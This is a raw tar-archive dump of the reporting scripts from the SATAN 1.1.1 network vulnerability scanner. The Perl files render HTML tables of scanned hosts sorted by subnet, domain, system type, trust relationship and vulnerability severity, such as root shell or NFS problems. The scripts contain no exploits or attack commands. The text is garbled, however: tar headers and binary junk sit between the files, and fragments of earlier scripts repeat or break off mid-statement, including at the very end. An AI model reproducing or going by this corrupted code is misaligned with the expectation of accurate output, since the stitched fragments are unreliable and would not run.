"> </h3> </FORM> <hrsatan-1.1.1/html/reporting/analysis.pl.............................................................. 600 . 465 . 506 . 2230 5737240613 13032. .................................................................................................. ................................................................................................................................................................................................................................................................. .print CLIENT <<EOF; <HTML> <HEAD> <title>SATAN Reporting and Analysis</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Reporting and Analysis</H1> <HR> <h2> Table of contents</h2> <HL> <p> <strong> Vulnerabilities </strong> <ul> <li> <a href=satan_results_danger.pl> By Approximate Danger Level </a> <li> <a href=satan_severity_types.pl> By Type of Vulnerability </a> <li> <a href=satan_severity_counts.pl> By Vulnerability Count </a> </ul> <strong> Host Information </strong> <ul> <li> <a href=satan_info_class.pl> By Class of Service</a> <li> <a href=satan_info_OS.pl> By System Type</a> .<li> <a href=satan_info_domain.pl> By Internet Domain</a> <li> <a href=satan_info_subnet.pl> By Subnet</a> .<li> <a href=satan_info_name.pl> By Host Name</a> </ul> <p> <strong> Trust</strong> <ul> <li> <a href=satan_info_trusted.pl> Trusted Hosts</a> <li> <a href=satan_info_trusting.pl> Trusting Hosts</a> .</ul> <p> <HL> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> </BODY> </HTML> EOF ·..ƒ╓é¼┌.û[sF.ÜT.¢ª╫:[k..«ΣM.ÿ▒/█ƒºw─E.P${rÇZªO:┤∩q}┴z£+fQ╤≤o2÷╡ôÜr╟.!Ñwd╨.%~╠╢π·.º'!╗Ny.ÜD;¡.úü█n┼yÑφ╓▓┼╓▓_╘[>x╣⌐║f╝O¿ò..┼.F╤┘║/∙░.)t┬╓òí.╝m{┤ ;ú.█╣üa_╤╗▒Yô¼╬E│æσ5π{╣±zF_╗ùQ9┐E;[pz╝¡─┐..└.╔╓≡█═..┴.▄éâ╓╕█▒║.|»≈╗»G╕┬5<A.Ü╜│.┐7▄=┬.B╕▒.A<─â[╝-σ{┐.┼¥╫╡3{╡].}⌡.·Éz╞½╣╣╒O╣q£₧Yzw{<╚a./(\╚.<╞y▄╚..╔ò╝╔13╔¥|óS;╩⌐\9o╝╩i.╩▒\╩e|╦¥╕╦╜▄ê»<╠╔╝╠═.╠╤<═╒|═┘╝═▌.═ß|₧....;íâε≤╓l}èsatan-1.1.1/html/reporting/satan_info_sub net.pl..................................................... 600 . 465 . 506 . 2312 5737240716 14715. .............................................................................................................................................. ......................................................................................................................................................................................................................# # Report subnets # # generate the tables for looking subnets/hosts in: &make_subnet_info(); $_subnets = keys %all_subnets; sub sort_ip { local($aip,$bip); for $ip (split(/\./,$a)) { $aip = $aip * 256 + $ip; } for $ip (split(/\./,$b)) { $bip = $bip * 256 + $ip; } return $aip <=> $bip; } print CLIENT <<EOF; <HTML> <HEAD> <title> Host Tables - By Subnet </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - By Subnet </H1> <hr> <h3>$_subnets Subnets. Number of hosts per subnet (vulnerable/total). </h3> <strong>Subnets with a red dot next to them have a vulnerable host contained within.</strong> <ul> EOF # until the subnet is all looked at... for $_net (sort sort_ip keys %all_subnets) { $dot = $subnet_severities{$_net} ? "red" : "black"; print CLIENT <<EOF; . <dt><IMG SRC=$HTML_ROOT/dots/$dot\dot.gif ALT="$dot"> . <a href="satan_results_subnet.pl,$_net,"> $_net </a> . ($subnet_severities{$_net}/$subnet_count{$_net}) EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF aip * 256 + $ip; } for $ip (split(/\./,$b)) { $bip = $bip * 256 + $ip; } return $aip <=> $bip; } print CLIENT <<EOF; <HTML> <HEAD> <title> Host Tables - By Subnet </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - By Subnetsatan-1.1.1/html/reporting/satan_severity_hosts.pl.................................................. 600 . 465 . 506 . 2363 5737241267 15504. .................................... ................................................................................................................................................................................................................................................................. ...............................................................# # Show all hosts with a specific vulnerability. # ($_SEVERITY, $_sort_order) = split(/,/, $html_script_args); ($_severity = $_SEVERITY) =~ tr /?!/ \//; ($_tutorial = $_severity) =~ tr / /_/; print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - $_severity </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_severity </H1> <hr> <h2> Tutorial: <a href="$HTML_ROOT/tutorials/vulnerability/$_tutorial.html>$_severity</a>. </h2> <h3> $severity_type_count{$_severity} Host(s). Number of vulnerabilities in parentheses. </h3> <H4> Sort hosts by: <a href="satan_severity_hosts.pl,$_SEVERITY,name,">name</a> | <a href="satan_severity_hosts.pl,$_SEVERITY,domain,">domain</a> | <a href="satan_severity_hosts.pl,$_SEVERITY,type,">system type</a> | <a href="satan_severity_hosts.pl,$_SEVERITY,subnet,">subnet</a> | <a href="satan_severity_hosts.pl,$_SEVERITY,severity,">problem count</a> </H4> EOF @_hosts = keys %{$severity_type_host_info{$_severity}}; do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ;¡.úü█n┼yÑφ╓▓┼╓▓_╘[>x╣⌐║f╝O¿ò..┼.F╤┘║/∙░.)t┬╓òí.╝m{┤ ;ú.█╣üa_╤╗▒Yô¼╬E│æσ5π{╣±zF_╗ùQ9┐E;[pz╝¡─┐..└.╔╓≡█═..┴.▄éâ╓╕█▒║.|»≈╗»G╕┬5<A.Ü╜│.┐7▄=┬.B╕▒.A<─â[╝-σ{┐.┼¥╫╡3{╡].}⌡.·Éz╞½╣╣╒O╣q£₧Yzw{<╚a./(\╚.<╞y▄╚..╔ò╝╔13╔¥|óS;╩⌐\9o╝╩i.╩▒\╩e|╦¥╕╦╜▄ê»<╠╔╝╠═.╠╤<═╒|═┘╝═▌.═ß|₧....;íâε≤╓l}èsatan-1.1.1/html/reporting/satan_severity _types.pl.................................................. 600 . 465 . 506 . 2025 5737241320 15471. .............................................................................................................................................. ......................................................................................................................................................................................................................# # Report vulnerability classes # sub sort_numeric { .$severity_type_count{$b} <=> $severity_type_count{$a}; } print CLIENT <<EOF; <HTML> <HEAD> <title> Vulnerabilities - By Type</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Vulnerabilities - By Type</H1> <hr> <h3>Number of hosts per vulnerability type.</h3> EOF &make_severity_info(); if (sizeof(*severity_type_host_info) > 0) { print CLIENT <<EOF; <ul> EOF for (sort sort_numeric keys %severity_type_host_info) { .($_type = $_) =~ tr / \//?!/; .print CLIENT <<EOF; .<li> .<a href="satan_severity_hosts.pl,$_type,"> .$_ - $severity_type_count{$_} host(s)</a> EOF } print CLIENT <<EOF; </ul> .<strong>Note: hosts may appear in multiple categories. </strong> EOF } else { print CLIENT <<EOF No vulnerability information found. EOF } print CLIENT <<EOF <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ity classes # sub sort_numeric { .$severity_type_count{$b} <=> $severity_type_count{$a}; } print CLIENT <<EOF; <HTML> <HEAD> <title> Vulnerabilities - By Type</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Vulnerabilities - By Type</H1> <hr> <h3>Number of hosts per vulnerability type.</h3> EOF &make_severity_info(); if (sizeof(*severity_type_host_info) > 0) { print CLIENT <<EOF; <ul> EOF for (sort sort_numeric satan-1.1.1/html/reporting/satan_severity_counts.pl................................................. 600 . 465 . 506 . 1327 5737240772 15656. .......................................................................... ................................................................................................................................................................................................................................................................. .........................# # Sort hosts by number of vulnerabilties. # &make_severity_info(); print CLIENT <<EOF; <HTML> <HEAD> <title> Vulnerabilities - By Counts </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Vulnerabilities - By Counts </H1> <hr> <h3> Hosts by descending vulnerability counts. </h3> EOF $_sort_order = "severity"; @_hosts = keys %severity_host_count; do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF No vulnerability information found. EOF .if @_hosts == 0; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF /ul> .<strong>Note: hosts may appear in multiple categories. </strong> EOF } else { print CLIENT <<EOF No vulnerability information found. EOF } print CLIENT <<EOF <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a>satan-1.1.1/html/reporting/satan_results_danger.pl.................................................. 600 . 465 . 506 . 6603 5737771155 15440. ....................................... ................................................................................................................................................................................................................................................................. ............................................................# # # print CLIENT <<EOF; <HTML> <HEAD> <TITLE>Vulnerabilities - Danger Levels</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC="$HTML_ROOT/images/satan.gif" ALT="*"> Vulnerabilities - Danger Levels</H1> <HR> EOF ; $_rs = $_us = $_ns = $_uw = $_ur = $_nw = $_nr = $_nfs = ""; # make some indices... if (sizeof(*severity_levels) > 0) { .for $_type (sort keys %severity_levels) { .if ($_type eq "rs") { ..$_rs = "<LI><A HREF=\"#root\">Root shell</A>"; } .elsif ($_type eq "us") { ..$_us = "<LI><A HREF=\"#user\">User shell</A>"; } .elsif ($_type eq "ns") { ..$_ns = "<LI><A HREF=\"#unprivileged\">Unprivileged shell</A>";} .elsif ($_type eq "uw") { ..$_uw = "<LI><A HREF=\"#user file write\">User file write</A>"; } .elsif ($_type eq "uw") { ..$_ur = "<LI><A HREF=\"#user file read\">User file read</A>"; } .elsif ($_type eq "nr") { ..$_nr = "<LI><A HREF=\"#unpriv file read\">Unprivileged file read</A>"; } .elsif ($_type eq "nw") { ..$_nw = "<LI><A HREF=\"#unpriv file write\">Unprivileged file write</A>"; } .elsif ($_type eq "x") { ..$_nfs = "<LI><A HREF=\"#NFS\">NFS</A>"; } ..} print CLIENT <<EOF; <h3>Table of contents</h3> <ul> $_rs $_us $_ns $_uw $_ur $_nr $_nw $_nfs </ul> Note: hosts may appear in multiple categories. EOF .} &make_severity_info(); if (sizeof(*severity_levels) > 0) { .for $_type (sort keys %severity_levels) { ..# how serious is it? ..if ($_type eq "rs") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="root"><H3> Root shell Problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "us") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="user"><H3> User shell Problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "ns") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="unprivileged"> <H3> "nobody" shell Problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "ur") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="user file read"> <H3> User reading file problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "uw") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="user file write"> <H3> User writing file problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "nr") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="unpriv file read"> <H3> "nobody" reading file problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "nw") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="unpriv file write"> <H3> "nobody" writing file problems </H3></A> ...<HL> ...<UL> EOF ...} ..elsif ($_type eq "x") { ...print CLIENT <<EOF; ...<HR> ...<A NAME="NFS"> <H3> NFS Problems </H3></A> ...<HL> ...<UL> EOF ...} ..$_last_tmp = ""; ..$_last_txt = ""; ..# split all the targets into separate lines ..for $_tmp (sort keys %{$severity_levels{$_type}}) { ...for (sort split(/\n/, $severity_levels{$_type}{$_tmp})) { ....&satan_split($_); ....($_tutorial = $service_output) =~ tr / /_/; ....# just weed out the dups ....next if ($_last_tmp eq $_tmp && $text eq $_last_txt); ....$_last_tmp = $_tmp; ....$_last_txt = $text; ....print CLIENT <<EOF; ...<li> ...<a href="satan_info_host.pl,$_tmp,">$_tmp</a> ...<a href="$HTML_ROOT/tutorials/vulnerability/$_tutorial.html">($text)</a> EOF ....} ...} ..print CLIENT <<EOF; ...</UL> EOF ..} .} else { .print CLIENT <<EOF; .<P> No vulnerability information found. EOF .} print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF Dy═mÉ|┌Y╚X╞±=2l:─.'..I.╜iìN┬ñ..├º╞Ñ.2á▄┼.\Θ╟ë%oY±ß .1G─┼α≥òè.Ñ.τ.└_.G$T╙╧░«σ%*▐Ω)3▒S.ë.B^ólÿ╝a.ADù½iJïÉ╒≥è≤b∙9∞┼)£a╪&)ªúò>9╙Æsatan-1.1.1/html/reporting/sort_hosts.pl............................................................ 600 . 465 . 506 . 10036 5737226415 13445. ........................... ................................................................................................................................................................................................................................................................. ........................................................................# # Display a list of hosts sorted on some attribute; hosts may be member # of more than group. # &make_severity_info(); $_sort_title = ""; %_sort_group = (); $_sort_sub = ""; %_not_linked = (); $_sort_note = ""; # # Factor out sort-order dependent code. # sub sort_alpha { $a cmp $b; } sub sort_severity { .$_res = ($severity_host_count{$b} <=> $severity_host_count{$a}); .return ($_res != 0) ? $_res : $a cmp $b; } sub sort_ip { .local($aip,$bip); .for $ip (split(/\./,$a)) { $aip = $aip * 256 + $ip; } .for $ip (split(/\./,$b)) { $bip = $bip * 256 + $ip; } .return $aip <=> $bip; } $_sort_toc = "sort_alpha"; if ($_sort_order eq "" || $_sort_order eq "name") { .$_sort_group{""} = join(' ', @_hosts); } elsif ($_sort_order eq "severity") { .$_sort_group{""} = join(' ', @_hosts); .$_sort_sub = "sort_severity"; } elsif ($_sort_order eq "subnet") { .&make_subnet_info(); .$_sort_title = "Subnet"; .$_sort_link = "satan_results_subnet.pl"; .for (@_hosts) { $_sort_group{$host_subnet{$_}} .= "$_ "; } .$_sort_toc = "sort_ip"; } elsif ($_sort_order eq "type") { .&make_hosttype_info(); .$_sort_title = "System type"; .$_sort_link = "satan_info_OStype.pl"; .for (@_hosts) { $_sort_group{$hosttype{$_}} .= "$_ "; } } elsif ($_sort_order eq "domain") { .&make_domain_info(); .$_sort_title = "Internet domain"; .$_sort_link = "satan_results_domain.pl"; .for (@_hosts) { $_sort_group{$host_domain{$_}} .= "$_ "; } } elsif ($_sort_order eq "severity_type") { .$_sort_title = "Problem type"; .$_sort_link = "satan_severity_hosts.pl"; .for $_host (@_hosts) { ..if (exists($severity_host_type_info{$_host})) { ...for $_type (keys %{$severity_host_type_info{$_host}}) { ....$_sort_group{$_type} .= "$_host "; ...} ..} else { ...$_type = "(none)"; ...$_sort_group{$_type} .= "$_host "; ...$_not_linked{$_type} = 1; ..} .} .$_sort_note = "Note: a host may appear in more than one category."; } elsif ($_sort_order eq "trusted_type") { .$_sort_title = "Hosts trusted by $_trustee"; .for $_host (@_hosts) { ..for $_type (keys %{$trust_host_type{"$_host $_trustee"}}) { ...$_sort_group{$_type} .= "$_host "; ...$_not_linked{$_type} = 1; ..} .} .$_sort_note = "Note: a host may appear in more than one category."; } elsif ($_sort_order eq "trustee_type") { .$_sort_title = "Hosts trusting $_trusted"; .for $_host (@_hosts) { ..for $_type (keys %{$trust_host_type{"$_trusted $_host"}}) { ...$_sort_group{$_type} .= "$_host "; ...$_not_linked{$_type} = 1; ..} .} .$_sort_note = "Note: a host may appear in more than one category."; } # # Make a nice table of contents. # if ($_sort_title) { .print CLIENT <<EOF; .<hr> .<h3>$_sort_title: table of contents.</h3> .<ul> EOF .for $_group (sort $_sort_toc keys %_sort_group) { ..$_count = $_bad = 0; ..for $_host (split(/\s/, $_sort_group{$_group})) { ...$_count++; ...$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" ALT="$_alt"> ..<a href="#$_group">$_group</a> $_counts EOF .} .print CLIENT <<EOF; .</ul> .$_sort_note .<hr> EOF } # # Finally, list all those groups and their respective host members. # $_sort_sub = "sort_alpha" if $_sort_sub eq ""; for $_group (sort $_sort_toc keys %_sort_group) { .if ($_sort_title) { ..print CLIENT <<EOF; ..<h3> ..<a name="$_group"> ..$_sort_title: EOF ..if ($_not_linked{$_group}) { ...print CLIENT <<EOF; ...$_group. EOF ..} else { ...($_GROUP = $_group) =~ tr / \//?!/; ...print CLIENT <<EOF; ...<a href="$_sort_link,$_GROUP,">$_group</a>. EOF ..} ..print CLIENT <<EOF; ..</h3> EOF .} .print CLIENT <<EOF; .<ul> EOF .for (sort $_sort_sub split(/\s/, $_sort_group{$_group})) { ..if ($severity_host_count{$_}) { ...$_dot = "reddot"; ...$_alt = "*"; ...$_bad = "($severity_host_count{$_})"; ..} else { ...$_dot = "blackdot"; ...$_alt = "-"; ...$_bad = ""; ..} ..print CLIENT <<EOF; ..<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> ..<a href="satan_info_host.pl,$_,"> $_</a> $_bad EOF .} .print CLIENT <<EOF; .</ul> EOF } σ)╫îG£$█b╩░o.cOºΦF<O╘║i╢≥A∙¬╤┌─vê..▀Mæ▓µbV8U▀▄π╝.∞`┬╥╤[P÷MíΘ⌐├'p>╥▄─£≤i┼E█∙Yâ÷┤÷w;d.Ñ.╒ç.YΣ? ┼IwV╛Ü,▓t∩Zδ.╙┘╧2âbÜ.£>E.W╙Ií`D .╧]ìZƒαu╡~7*╠f.╢M<{g┤Ñ}clW8╓6\m-Σ╜Θ╬.fò¿i╤qSz⌐▌°«ér.t;.U├┌╝.┌─L.╡{X.xït╦W╗QG┴╜è .├ó}Nα¼.^┼ÿm╡╥├±.W...▐Mÿ[╠ç▐÷─.¥ªqî+d.÷LM.«┬.+.ï╤┼≈2½▌.îo.î└σ¡╟ó╒r.w{-.G─.M.╢0%£.E>.H∙╟h.╗,µ..f╞%gSúB.Γâ.¼║C⌐Ωs├ê╚4/ Σ═╫\^┼ÑJ╙<+I╛H⌠]╗.╣¥⌡8]KmjJτ╓∞ß=╙╓╣«k6║.φß(lVτNw¼╧Vδ.╧╪ÿ╦¬╡÷C÷M┌.¬α╓-\σb·nOO|vUy≤O└°lI┼|çihM╡7∙Θß╢eëß╛8ß-╛≡É/.vE>ßûq╛ë..:▌.╛α▓╖v▌%ù=í║εUù═U┼╬┴á»TB.$┐ïíú┼▒;ƒ .╪satan-1.1.1/html/reporting/satan_info_OS.pl......................................................... 600 . 465 . 506 . 3373 5737240622 13742. ................................................................................................... ................................................................................................................................................................................................................................................................. # # Report all operating system classes. On the fly evaluate the number of # hosts per class, per operating system version and related statistics. # print CLIENT <<EOF; <HTML> <HEAD> <title> Host Tables - by System Type </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by System Type </H1> <hr> <h3>Number of hosts per system type (vulnerable/total).</h3> <ul> EOF &make_hosttype_info() ; for (sort keys %systypes_by_class) { .# Mask possible blanks in the system class names. .($_class = $_) =~ tr / \//?!/; .$sysclass_severities{$_class} = 0 ..unless defined($sysclass_severities{$_class}); .$_dot = $sysclass_severities{$_} ? "reddot" : "blackdot"; .$_alt = $sysclass_severities{$_} ? "*" : "-"; .print CLIENT <<EOF .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<a href="satan_info_OSclass.pl,$_class,"> $_</a> .($sysclass_severities{$_}/$sysclass_counts{$_}) EOF .unless /other/; } if (sizeof(*hosttype) > 0) { .$_class = "other"; .$sysclass_severities{$_class} = 0 ..unless defined($sysclass_severities{$_class}); .$_dot = $sysclass_severities{$_class} ? "reddot" : "blackdot"; .$_alt = $sysclass_severities{$_class} ? "*" : "-"; .print CLIENT <<EOF; .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<a href="satan_info_OSclass.pl,other,"> Other/unknown</a> .($sysclass_severities{$_class}/$sysclass_counts{$_class}) .</ul> .<HL><strong>System types with a red dot next to them have a vulnerable host contained within.</strong> EOF } else { .print CLIENT <<EOF; .</ul> .No system type information available. EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ..$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" satan-1.1.1/html/reporting/satan_info_OSclass.pl.................................................... 600 . 465 . 506 . 2036 5737240427 14766. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # Report all versions of the specified operating system class. # &make_hosttype_info(); ($_class) = split(/,/, $html_script_args); $_class =~ tr /?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> System type - $_class </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> System type - $_class </H1> <hr> <h3>Number of hosts per operating system version (vulnerable/total).</h3> <ul> EOF for (sort split(/\n/, $systypes_by_class{$_class})) { .# Mask possible blanks and slashes in the system type names. .($_type = $_) =~ tr / \//?!/; .$_dot = $systype_severities{$_} ? "reddot" : "blackdot"; .$_alt = $systype_severities{$_} ? "*" : "-"; .print CLIENT <<EOF; .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<a href="satan_info_OStype.pl,$_type,"> $_</a> .($systype_severities{$_}/$systype_counts{$_}) EOF } print CLIENT <<EOF </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </ul> .No system type information available. EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ..$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" satan-1.1.1/html/reporting/satan_results_subnet.pl.................................................. 600 . 465 . 506 . 2100 5737240751 15455. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # List all hosts in a subnet # ($_subnet, $_sort_order) = split(/,/, $html_script_args); print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - Subnet $_subnet</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - Subnet $_subnet</h1> <hr> <h3> $subnet_severities{$_subnet} Vulnerable/$subnet_count{$_subnet} total. Vulnerability counts in parentheses. </h3> <H4> Sort hosts by: <A HREF="satan_results_subnet.pl,$_subnet,name,">name</a> | <A HREF="satan_results_subnet.pl,$_subnet,domain,">domain</a> | <A HREF="satan_results_subnet.pl,$_subnet,type,">system type</a> | <A HREF="satan_results_subnet.pl,$_subnet,severity,">problem count</a> | <A HREF="satan_results_subnet.pl,$_subnet,severity_type,">problem type</a> </H4> EOF @_hosts = split(/\s/, $all_subnets{$_subnet}); do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF available. EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ..$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" satan-1.1.1/html/reporting/satan_info_servers.pl.................................................... 600 . 465 . 506 . 2264 5737240710 15106. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # List hosts that provide a specific service. # ($_SERVICE, $_sort_order) = split(/,/, $html_script_args); ($_service = $_SERVICE) =~ tr/?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - $_service Servers </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_service Servers </H1> <hr> <h3> $server_severities{$_service} Vulnerable/$server_counts{$_service} total. Vulnerability counts in parentheses. </h3> <H4> Sort hosts by: <a href="satan_info_servers.pl,$_SERVICE,name,">name</a> | <a href="satan_info_servers.pl,$_SERVICE,domain,">domain</a> | <a href="satan_info_servers.pl,$_SERVICE,type,">system type</a> | <a href="satan_info_servers.pl,$_SERVICE,subnet,">subnet</a> | <a href="satan_info_servers.pl,$_SERVICE,severity,">problem count</a> | <a href="satan_info_servers.pl,$_SERVICE,severity_type,">problem type</a> </H4> EOF @_hosts = keys %{$servers{$_service}}; do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ..$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" satan-1.1.1/html/reporting/satan_info_domain.pl..................................................... 600 . 465 . 506 . 2073 5737240657 14674. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # Report all internet domains. # print CLIENT <<EOF; <HTML> <HEAD> <title> Host Tables - by Internet Domain </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by Internet Domain </H1> <hr> <h3>Number of hosts per internet domain (vulnerable/total).</h3> <strong>Domains with a red dot next to them have a vulnerable host contained within.</strong> <ul> EOF &make_domain_info() ; for (sort keys %all_domains) { .next if (!$_); .$_dot = $domain_severities{$_} ? "reddot" : "blackdot"; .$_alt = $domain_severities{$_} ? "*" : "-"; .print CLIENT <<EOF; .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<a href="satan_results_domain.pl,$_,"> $_</a> .($domain_severities{$_}/$domain_count{$_}) EOF } print CLIENT <<EOF; </ul> EOF if (sizeof(*all_domains) == 0) { .print CLIENT <<EOF; .No domain information available. EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF > Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ..$_bad++ if exists($severity_host_type_info{$_host}); ..} ..$_dot = $_bad ? "reddot" : "blackdot"; ..$_alt = $_bad ? "*" : "-"; ..$_counts = ($_bad != $_count) ? "($_bad/$_count)" : "($_count)"; ..print CLIENT <<EOF; ..<dt><IMG SRC="$HTML_ROOT/dots/$_dot.gif" satan-1.1.1/html/reporting/satan_info_trusting.pl................................................... 600 . 465 . 506 . 1763 5737240731 15302. .......................................................... ................................................................................................................................................................................................................................................................. .........................................# # Report which hosts are trusting how many times # sub sort_numerically { .$total_trusted_count{$b} <=> $total_trusted_count{$a}; } print CLIENT <<EOF; <HTML> <HEAD> <title> Trust - Trusting Hosts</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - Trusting Hosts</H1> <hr> <h3>Trusting hosts (by number of trusted hosts).</h3> <ul> EOF &make_severity_info(); for (sort sort_numerically keys %total_trusted_count) { .$_dot = exists($severity_host_type_info{$_}) ? "reddot" : "blackdot"; .$_alt = exists($severity_host_type_info{$_}) ? "*" : "-"; .print CLIENT <<EOF; .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<A HREF="satan_info_host.pl,$_,">$_</A> - .<A HREF="satan_results_trusted.pl,$_,trusted_type,"> $total_trusted_count{$_} 